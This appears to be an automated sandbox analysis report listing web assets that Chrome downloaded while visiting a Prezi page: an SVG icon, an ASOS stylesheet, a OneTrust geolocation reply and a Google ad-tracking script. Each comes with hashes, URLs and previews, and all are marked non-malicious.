                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 19.2.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">.<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. width="18px" height="18px" viewBox="0 0 18 18" style="enable-background:new 0 0 18 18;" xml:space="preserve">.<style type="text/css">...st0{fill:#152235;}.</style>.<title>facebook</title>.<desc>Created with Sketch.</desc>.<g id="Page-2">..<g id="Payment-page-Copy-16" transform="translate(-778.000000, -718.000000)">...<g id="facebook" transform="translate(778.000000, 718.000000)">....<g id="Facebook">.....<path id="Shape" class="st0" d="M16,0H2C0.9,0,0,0.9,0,2v14c0,1.1,0.9,2,2,2h7v-7H7V8.5h2v-2c0-2.2,1.2-3.7,3.8-3.7l1.8,0v2.6......h-1.2c-1,0-1.4,0.7-1.4,1.4v1.7h2.6L14,11h-2v7h4c1.1,0,2-0.9,2-2V2C18,0.9,17.1,0,16,0L16,0z"/>....</g>..
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (61743)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):61820
                                                                                                                                                                                              Entropy (8bit):5.604462334629873
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:E1FED5CB2080507CEC02ABFFD34AEA27
                                                                                                                                                                                              SHA1:949810F40C57EC63B8A1EC55F12048EDA2BA1C80
                                                                                                                                                                                              SHA-256:ADA7E3010D976A16FC38D2A03C40E315B503C964A8857FD826D5E845084D151E
                                                                                                                                                                                              SHA-512:7A73AB20665D177CCCBFB1E2815402F3B9AD195A79D673D34F207FB63F68297741D4C916F25C40125C9C4E2CE17023756AD9763E7B03FD7D04F416A58DBF99CA
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://assets.asosservices.com/sitechromepublisher/client.sitechrome.styles.5e1a24317184f1ea8c00.css
                                                                                                                                                                                              Preview:.PbFpbqr{font-family:futura-pt,sans-serif;font-size:.75rem;font-weight:900;letter-spacing:1.7px;text-transform:uppercase}.jFyrDfG{font-size:.875rem}.jFyrDfG,.w3QwoQC{font-family:futura-pt,sans-serif;font-weight:900;letter-spacing:2px;text-transform:uppercase}.w3QwoQC{font-size:1rem}.fVdHxMU{font-family:futura-pt,sans-serif;font-size:.875rem;letter-spacing:.4px}.ByM_HVJ{display:inline-block;line-height:2.14;text-decoration:none}.ojIeyOc{display:none;margin:0 auto;padding:0}.aR_DfXn{align-items:center;display:flex;height:50px;padding:0 16px}.ojIeyOc a{color:var(--11lcxa5);text-decoration:none}.ojIeyOc ol{display:flex;white-space:nowrap}.F28iPnp,.F28iPnp span{display:inline-block}.F28iPnp span{padding:0 11px 0 14px}.F28iPnp:last-child{overflow:hidden;text-overflow:ellipsis}.F28iPnp:last-child,.F28iPnp:last-child a{color:var(--10c6hzt);margin-right:5px}@media (min-width:768px){.ojIeyOc{display:block;max-width:1366px}.ojIeyOc:not(:empty){height:50px}.aR_DfXn{padding:0 24px}}@media (min-widt
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):66
                                                                                                                                                                                              Entropy (8bit):3.9721077567347134
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:A20F61BBF661147FA65EC1ABF4093AED
                                                                                                                                                                                              SHA1:C7306A9A3F8224E2E564FD170242E4B26BBA7047
                                                                                                                                                                                              SHA-256:EFA3DA3BC784514C792213E4B3C842CF4DA752C0EC3EF14F4592A6A849DBEFCA
                                                                                                                                                                                              SHA-512:1BD4A45DC90A18265C78720955D80FCAC6A3656C23BBC0C480078D9407ACF205399FBDD22942242642D20EC73759DF5613620BFC27084C71AF448CC2F36D55F6
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
                                                                                                                                                                                              Preview:{"country":"US","state":"TX","stateName":"Texas","continent":"NA"}
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (4857), with no line terminators
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):4857
                                                                                                                                                                                              Entropy (8bit):5.833245492779352
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:90B846F2A153B57A5ACE20EDC83358D5
                                                                                                                                                                                              SHA1:E27A1E5254607E81729A46F3D165754696D9E6AF
                                                                                                                                                                                              SHA-256:7A827D2C284477EB43A1B9AB4F641C56E966DA7A54A1EB2F4485F2403881EA5C
                                                                                                                                                                                              SHA-512:3A7A9C18E0E6DDB2A719853726789161126A1BBE66171714D36D127B84A72CDDA6A1D820F46FE6B0A390DEE0D1A51A5FC43627990BFB5C2470E73A70264A4527
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/AW-958692981/?random=1730910100389&cv=11&fst=1730910100389&bg=ffffff&guid=ON&async=1&gtm=45be4au0z86358348za201zb6358348&gcd=13r3r3l3l5l1&dma=0&tag_exp=101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fprezi.com%2Fi%2Famopqalyrbyv%2Fjennifer-zisk-vitron-msw-lsw%2F&hn=www.googleadservices.com&frm=0&tiba=Jennifer%20Zisk-Vitron%2C%20MSW%2C%20LSW%20by%20Secure%20Bill%20on%20Prezi%20Design&npa=0&pscdl=noapi&auid=887411132.1730910099&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse&rfmt=3&fmt=4
                                                                                                                                                                                              Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                              No static file info